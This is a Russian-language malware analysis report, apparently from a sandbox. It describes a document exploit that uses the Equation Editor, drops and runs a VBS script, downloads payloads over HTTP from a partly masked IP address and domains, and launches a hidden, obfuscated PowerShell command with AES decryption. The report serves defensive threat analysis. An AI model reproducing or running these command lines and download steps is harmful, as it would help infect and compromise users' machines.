Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\mydatinglifeissoggod.vBS"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
- %APPDATA%\mydatinglifeissoggod.vbs
Сетевая активность
Подключается к
- 'tn#.wtf':80
- '10#.#75.229.144':80
- 'pa###code.dev':443
TCP
Запросы HTTP GET
- http://tn#.wtf/Z4c
- http://10#.#75.229.144/thissystemchangingentireprocessverygreattounderstandallthingsaregoodtohear___hehavingthegreatresultsbacktothegirlshand.doc
- http://10#.#75.229.144/mydatinglifeissoggod.vbs
Другие
- 'pa###code.dev':443
UDP
- DNS ASK tn#.wtf
- DNS ASK pa###code.dev
Другое
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esMana... (со скрытым окном)
